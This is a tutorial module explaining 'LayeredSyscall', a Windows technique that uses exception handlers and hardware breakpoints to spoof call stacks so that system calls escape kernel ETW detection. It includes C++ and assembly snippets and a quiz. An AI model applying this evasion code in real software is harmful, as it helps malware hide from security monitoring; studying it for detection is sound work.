Module 7: Argument Marshalling & Syscall Execution
Registers from the past, a stack from the present — the Frankenstein context that fools kernel telemetry.
The Critical Moment
When the three-condition algorithm (Module 6) reaches IsSubRsp == 2, we hold two things: a saved context from the original syscall (containing all the real arguments) and a live stack with genuine call frames from the MessageBoxW chain. The context swap merges these into a single execution state: real arguments + legitimate call stack. This is the moment everything comes together.
The Context Swap
The handler now performs the most critical operation in the entire technique: the context swap. It is a carefully ordered sequence that preserves exactly what is needed from each context.
C++

    // IsSubRsp == 2: all three conditions met
    if (IsSubRsp == 2) {
        // Step 1: Save the CURRENT RSP (legitimate call stack)
        ULONG_PTR TempRsp = ExceptionInfo->ContextRecord->Rsp;

        // Step 2: Restore the SAVED context (real syscall arguments)
        // This overwrites ALL registers including RSP
        memcpy(ExceptionInfo->ContextRecord,
               &SavedContext,
               sizeof(CONTEXT));

        // Step 3: Replace RSP with the legitimate stack pointer
        // This keeps the genuine call frames from MessageBoxW chain
        ExceptionInfo->ContextRecord->Rsp = TempRsp;

        // ... (syscall emulation and argument copying follow)
    }
Step-by-Step Breakdown
| Step | What Changes | Why |
|---|---|---|
| Save TempRsp | Copy current RSP to a local variable | The current RSP points to the legitimate call stack (MessageBoxW → user32 → ntdll). We must not lose this. |
| Restore SavedContext | Overwrite the entire CONTEXT with the saved snapshot | This restores RCX, RDX, R8, R9 (first 4 arguments), RAX, and all other registers to their values at the original syscall breakpoint |
| Replace RSP | Overwrite RSP with TempRsp | The saved RSP pointed to the wrapper function's stack. We replace it with the legitimate stack so the call frames above us are from the MessageBoxW chain. |
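Context Swap Visualized
Figure: two panels, "SavedContext (from Phase 2)" and "Current Context (from trace)", with kept fields in green and discarded fields in red. Every register except RSP is kept from SavedContext; only RSP is kept from the current context. The final state has real arguments + legitimate stack.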
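The three steps in the table above can be modelled without any Windows headers. The sketch below is an illustration only: `MockContext` and `SwapContext` are hypothetical names, and the struct carries just a few of the fields that a real CONTEXT holds. It shows that the merged state takes every register from the snapshot and only RSP from the live context.

```cpp
#include <cstdint>

// Hypothetical stand-in for a few CONTEXT fields; not the Windows structure.
struct MockContext {
    std::uint64_t Rax;
    std::uint64_t Rcx;
    std::uint64_t Rdx;
    std::uint64_t R8;
    std::uint64_t R9;
    std::uint64_t Rsp;
    std::uint64_t Rip;
};

// Returns the merged state: all registers from `saved`, RSP from `live`.
constexpr MockContext SwapContext(const MockContext& saved, const MockContext& live) {
    const std::uint64_t tempRsp = live.Rsp;  // Step 1: remember the live stack pointer
    MockContext merged = saved;              // Step 2: take every register from the snapshot
    merged.Rsp = tempRsp;                    // Step 3: put the live stack pointer back
    return merged;
}
```

The order matters for the same reason as in the handler: once the snapshot has been copied over the live context, the live RSP is gone unless it was saved first.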
Syscall Emulation
After the context swap restores the real arguments, the handler must set up the CPU state exactly as if the ntdll syscall stub had executed normally. This means emulating the two instructions that the stub performs before the syscall opcode:
x86-64 ASM

    ;; Normal ntdll stub (what we are emulating):
    mov r10, rcx      ; Save first argument (syscall clobbers RCX)
    mov eax, <SSN>    ; Load System Service Number
    syscall           ; Enter kernel

C++

    // Emulate: mov r10, rcx
    ExceptionInfo->ContextRecord->R10 =
        ExceptionInfo->ContextRecord->Rcx;

    // Emulate: mov eax, SSN
    ExceptionInfo->ContextRecord->Rax = SyscallNo;

    // Point RIP directly at the syscall instruction
    ExceptionInfo->ContextRecord->Rip =
        SyscallEntryAddr + OPCODE_SYSCALL_OFF;
Why R10 = RCX?
The x64 syscall instruction is destructive: it saves the return address in RCX (overwriting whatever was there) and saves RFLAGS in R11. This means the first argument (originally in RCX per the Windows x64 calling convention) would be lost. The ntdll stub copies RCX to R10 before the syscall so the kernel can read the first argument from R10 instead. LayeredSyscall must replicate this behavior.
| Register | Value Set | Purpose |
|---|---|---|
| R10 | Copy of RCX (first argument) | Kernel reads arg1 from R10 since syscall clobbers RCX |
| RAX | System Service Number (SSN) | Kernel uses RAX to index the System Service Descriptor Table (SSDT) |
| RIP | SyscallEntryAddr + OPCODE_SYSCALL_OFF | Execution resumes directly at the syscall instruction inside ntdll |
Extended Arguments (5th through 12th)
The x64 Windows calling convention passes the first four arguments in registers (RCX, RDX, R8, R9). Any additional arguments go on the stack. The context swap restored the registers but used the legitimate stack (TempRsp). That stack does not have the original arguments 5+. They must be copied from the saved stack.
C++

    if (ExtendedArgs) {
        ULONG_PTR Rsp      = ExceptionInfo->ContextRecord->Rsp;  // Legitimate stack
        ULONG_PTR SavedRsp = SavedContext.Rsp;                   // Original stack

        // Copy arguments 5 through 12 from saved stack to legitimate stack
        *(ULONG_PTR*)(Rsp + FIFTH_ARGUMENT)    = *(ULONG_PTR*)(SavedRsp + FIFTH_ARGUMENT);
        *(ULONG_PTR*)(Rsp + SIXTH_ARGUMENT)    = *(ULONG_PTR*)(SavedRsp + SIXTH_ARGUMENT);
        *(ULONG_PTR*)(Rsp + SEVENTH_ARGUMENT)  = *(ULONG_PTR*)(SavedRsp + SEVENTH_ARGUMENT);
        *(ULONG_PTR*)(Rsp + EIGHTH_ARGUMENT)   = *(ULONG_PTR*)(SavedRsp + EIGHTH_ARGUMENT);
        *(ULONG_PTR*)(Rsp + NINTH_ARGUMENT)    = *(ULONG_PTR*)(SavedRsp + NINTH_ARGUMENT);
        *(ULONG_PTR*)(Rsp + TENTH_ARGUMENT)    = *(ULONG_PTR*)(SavedRsp + TENTH_ARGUMENT);
        *(ULONG_PTR*)(Rsp + ELEVENTH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + ELEVENTH_ARGUMENT);
        *(ULONG_PTR*)(Rsp + TWELVETH_ARGUMENT) = *(ULONG_PTR*)(SavedRsp + TWELVETH_ARGUMENT);
    }
Argument Offset Table
| Argument | Passing Method | Stack Offset | Macro |
|---|---|---|---|
| 1st (arg1) | RCX register | — | — |
| 2nd (arg2) | RDX register | — | — |
| 3rd (arg3) | R8 register | — | — |
| 4th (arg4) | R9 register | — | — |
| 5th | Stack | RSP + 0x28 | FIFTH_ARGUMENT |
| 6th | Stack | RSP + 0x30 | SIXTH_ARGUMENT |
| 7th | Stack | RSP + 0x38 | SEVENTH_ARGUMENT |
| 8th | Stack | RSP + 0x40 | EIGHTH_ARGUMENT |
| 9th | Stack | RSP + 0x48 | NINTH_ARGUMENT |
| 10th | Stack | RSP + 0x50 | TENTH_ARGUMENT |
| 11th | Stack | RSP + 0x58 | ELEVENTH_ARGUMENT |
| 12th | Stack | RSP + 0x60 | TWELVETH_ARGUMENT |
Why 0x28 for the 5th Argument?
On x64 Windows, the caller reserves 32 bytes (0x20) of shadow space (also called "home space") on the stack for the first 4 arguments, even though they travel in registers. At the point where the callee begins executing, the return address occupies the 8 bytes at RSP + 0x00 and the shadow space occupies RSP + 0x08 through RSP + 0x27. The 5th argument therefore sits at RSP + 0x28 (return address 0x08 + shadow space 0x20 = 0x28). Each subsequent argument is 8 bytes further.
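The arithmetic behind the offset table can be checked at compile time. This is a small sketch, not code from the project: `StackArgOffset` and the `k...` constants are hypothetical names introduced here, and the layout assumed is the one described above (return address first, then four home slots).

```cpp
#include <cstddef>

constexpr std::size_t kSlotSize      = 8;     // one 64-bit stack slot
constexpr std::size_t kReturnAddress = 8;     // pushed by the call instruction
constexpr std::size_t kShadowSpace   = 0x20;  // four home slots for RCX, RDX, R8, R9

// Offset from RSP (at callee entry) of the n-th argument.
// Only meaningful for n >= 5; arguments 1 to 4 travel in registers.
constexpr std::size_t StackArgOffset(std::size_t n) {
    return kReturnAddress + kShadowSpace + (n - 5) * kSlotSize;
}

static_assert(StackArgOffset(5)  == 0x28, "5th argument");
static_assert(StackArgOffset(12) == 0x60, "12th argument");
```

Because the return address and the four home slots together fill exactly five 8-byte slots, the formula reduces to `n * 8` for every stack-passed argument.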
Why Not Always Copy?
Functions with 4 or fewer arguments (like NtClose with 1 argument) do not use stack arguments. The ExtendedArgs flag avoids unnecessary memory writes for these simple functions. This is both a performance optimization and a safety measure — writing to stack locations that are not expected to hold arguments could corrupt other data.
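The copy and its guard can be modelled on plain arrays. The sketch below is illustrative: `MockStack`, `NeedsExtendedArgs`, and `CopyExtendedArgs` are hypothetical names, and `slot[i]` stands for the 8-byte value at RSP + 8 * i, so slots 5 through 12 correspond to offsets 0x28 through 0x60. It assumes the flag is simply "more than four parameters", which matches the tables in this module.

```cpp
#include <cstddef>
#include <cstdint>

// Hypothetical model of a stack: slot[i] is the 8-byte value at RSP + 8 * i.
struct MockStack {
    std::uint64_t slot[16];
};

constexpr std::size_t kFirstStackArg = 5;   // RSP + 0x28
constexpr std::size_t kLastStackArg  = 12;  // RSP + 0x60

// A function needs the copy only when it has more than four parameters.
constexpr bool NeedsExtendedArgs(std::size_t argCount) {
    return argCount > 4;
}

// Returns `live` with the slots for arguments 5..12 taken from `saved`.
// Slots outside that range (return address, home space, anything above)
// are left exactly as they were on the live stack.
constexpr MockStack CopyExtendedArgs(MockStack live, const MockStack& saved) {
    for (std::size_t n = kFirstStackArg; n <= kLastStackArg; ++n) {
        live.slot[n] = saved.slot[n];
    }
    return live;
}
```

Skipping the copy when `NeedsExtendedArgs` is false leaves eight slots of the live stack untouched, which is the safety property the paragraph above describes.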
Clearing the Trap Flag
After the context swap and syscall emulation are complete, the handler must clear the Trap Flag (bit 8 of EFLAGS, mask 0x100). If it remained set, the CPU would raise another SINGLE_STEP exception after every subsequent instruction, starting with the real syscall stub, and the handler would keep being re-entered after its work is finished.
C++

    // Clear the Trap Flag - stop single-stepping
    ExceptionInfo->ContextRecord->EFlags &= ~0x100;

    // Reset the state machine for the next wrapped syscall
    IsSubRsp = 0;

    return EXCEPTION_CONTINUE_EXECUTION;

    // Execution resumes at the syscall instruction with:
    //   - Real arguments in registers (RCX, RDX, R8, R9)
    //   - R10 = RCX (syscall convention)
    //   - RAX = SSN
    //   - RSP pointing to legitimate call stack with args 5+ copied
    //   - RIP at the syscall instruction inside ntdll
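The constant 0x100 in the snippet above is the Trap Flag, bit 8 of EFLAGS. A minimal sketch of the mask arithmetic follows; the helper names are hypothetical and the functions operate on a plain integer rather than on a real CONTEXT.

```cpp
#include <cstdint>

constexpr std::uint32_t kTrapFlag = 1u << 8;  // EFLAGS.TF

constexpr std::uint32_t SetTrapFlag(std::uint32_t eflags) {
    return eflags | kTrapFlag;
}

constexpr std::uint32_t ClearTrapFlag(std::uint32_t eflags) {
    return eflags & ~kTrapFlag;
}

constexpr bool IsTrapFlagSet(std::uint32_t eflags) {
    return (eflags & kTrapFlag) != 0;
}

static_assert(kTrapFlag == 0x100, "TF is bit 8");
static_assert(ClearTrapFlag(0x346) == 0x246, "only TF changes");
```

Masking with `~kTrapFlag` leaves every other flag as it was, which is why the handler can clear single-stepping without disturbing the condition codes restored from the saved context.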
What Happens Next
The syscall instruction executes inside ntdll.dll memory, with genuine call stack frames above it, correct arguments, and the proper SSN in RAX. The kernel processes the request normally. To the kernel's ETW telemetry, this looks like a completely legitimate system call from a standard API chain.
Phase 4: Clean Return via Dr1
After the kernel completes the syscall, execution returns to the ret instruction in the ntdll stub (immediately after the syscall instruction). The Dr1 hardware breakpoint fires, generating another EXCEPTION_SINGLE_STEP.
C++

    // Inside HandlerHwBp - Phase 4: Return breakpoint
    if (ExceptionInfo->ContextRecord->Rip ==
        SyscallEntryAddr + OPCODE_SYSCALL_RET_OFF)
    {
        // 1. Disable Dr1 breakpoint (clear bit 2 in Dr7)
        ExceptionInfo->ContextRecord->Dr7 &= ~(1 << 2);

        // 2. Restore the original RSP from SavedContext
        //    This points back to the wrapper function's stack frame
        ExceptionInfo->ContextRecord->Rsp = SavedContext.Rsp;

        // 3. Continue execution - the 'ret' instruction will now
        //    return to the wrapper function as if nothing happened
        return EXCEPTION_CONTINUE_EXECUTION;
    }
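Clearing bit 2 disables Dr1 because DR7 keeps its enable bits in pairs: for debug register n, the local-enable bit is bit 2n and the global-enable bit is bit 2n + 1. The sketch below spells that out; the helper names are hypothetical and the functions work on a plain 64-bit value, not on a thread context.

```cpp
#include <cstdint>

// Local-enable bit for debug register `index` (0..3): L0 = bit 0, L1 = bit 2, ...
constexpr std::uint64_t Dr7LocalEnableMask(unsigned index) {
    return 1ull << (index * 2);
}

// Returns `dr7` with the local-enable bit for `index` cleared.
constexpr std::uint64_t DisableLocalBreakpoint(std::uint64_t dr7, unsigned index) {
    return dr7 & ~Dr7LocalEnableMask(index);
}

static_assert(Dr7LocalEnableMask(1) == (1ull << 2), "Dr1 is enabled by bit 2");
static_assert(DisableLocalBreakpoint(0x5, 1) == 0x1, "Dr0 stays enabled");
```

Only the Dr1 enable bit changes, so a breakpoint in Dr0 stays armed while the return breakpoint is switched off.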
Why Restore RSP Here?
During the syscall, RSP pointed to the legitimate stack (from the MessageBoxW chain). But the wrapper function expects to resume with its own stack frame. By restoring SavedContext.Rsp, the ret instruction pops the correct return address and execution returns to the wrapper function. The return value (NTSTATUS) is in RAX, exactly where the wrapper expects it.
Clean Return Flow
Kernel returns with RAX = NTSTATUS → Dr1 raises SINGLE_STEP → handler restores RSP → ret returns to wrapper → wrapper returns NTSTATUS
Memory Layout During Execution
Understanding the state of RSP at each phase is critical to understanding the full technique:
Stack State at Each Phase
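Figure panels: Phase 2: Syscall BP (RSP on the wrapper function's stack), Phase 3: After Swap (RSP on the legitimate stack from the MessageBoxW chain), Phase 4: After Return (RSP restored to SavedContext.Rsp).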
The Complete Wrapped Syscall List
LayeredSyscall wraps approximately 31 native API functions. Here is a representative subset grouped by category, showing their argument counts and whether they require extended argument copying:
Process & Thread
| Function | Args | ExtendedArgs |
|---|---|---|
| NtCreateUserProcess | 11 | TRUE |
| NtOpenProcess | 4 | FALSE |
| NtTerminateProcess | 2 | FALSE |
| NtCreateThreadEx | 11 | TRUE |
| NtOpenThread | 4 | FALSE |
| NtResumeThread | 2 | FALSE |
| NtSuspendThread | 2 | FALSE |
Memory
| Function | Args | ExtendedArgs |
|---|---|---|
| NtAllocateVirtualMemory | 6 | TRUE |
| NtProtectVirtualMemory | 5 | TRUE |
| NtFreeVirtualMemory | 4 | FALSE |
| NtWriteVirtualMemory | 5 | TRUE |
| NtReadVirtualMemory | 5 | TRUE |
| NtMapViewOfSection | 10 | TRUE |
| NtUnmapViewOfSection | 2 | FALSE |
Section, Query & Token
| Function | Args | ExtendedArgs |
|---|---|---|
| NtCreateSection | 7 | TRUE |
| NtQueryInformationProcess | 5 | TRUE |
| NtQuerySystemInformation | 4 | FALSE |
| NtQueryVirtualMemory | 6 | TRUE |
| NtOpenProcessToken | 3 | FALSE |
| NtDuplicateToken | 6 | TRUE |
| NtAdjustPrivilegesToken | 6 | TRUE |
Handle & Object
| Function | Args | ExtendedArgs |
|---|---|---|
| NtClose | 1 | FALSE |
| NtDuplicateObject | 7 | TRUE |
| NtWaitForSingleObject | 3 | FALSE |
Notable Absence: NtSetContextThread
NtSetContextThread cannot be wrapped because it modifies thread context — including the debug registers that LayeredSyscall depends on. Wrapping it would create a circular dependency: the hardware breakpoints need to be active to intercept the syscall, but the syscall itself would modify those same breakpoints.
Module 7 Quiz: Argument Marshalling
Q1: Why does the syscall emulation set R10 = RCX?
The syscall instruction saves RIP into RCX and RFLAGS into R11. This destroys the first argument (which was in RCX). The ntdll stub copies RCX to R10 before issuing syscall so the kernel can read the first argument from R10. LayeredSyscall emulates this behavior.
Q2: At what stack offset does the 5th argument begin, and why?
At RSP + 0x28. The return address takes 8 bytes at RSP + 0x00 and the shadow space for the four register arguments takes the next 0x20 bytes, so the first stack-passed argument lands at 0x08 + 0x20 = 0x28. Each later argument is 8 bytes further.
Q3: What does the Dr1 breakpoint handler do after the syscall returns from kernel mode?
It disables the Dr1 breakpoint and restores RSP to SavedContext.Rsp (the wrapper function's stack pointer). When the ret instruction executes, it pops the return address from the original stack and returns to the wrapper function with the NTSTATUS result in RAX.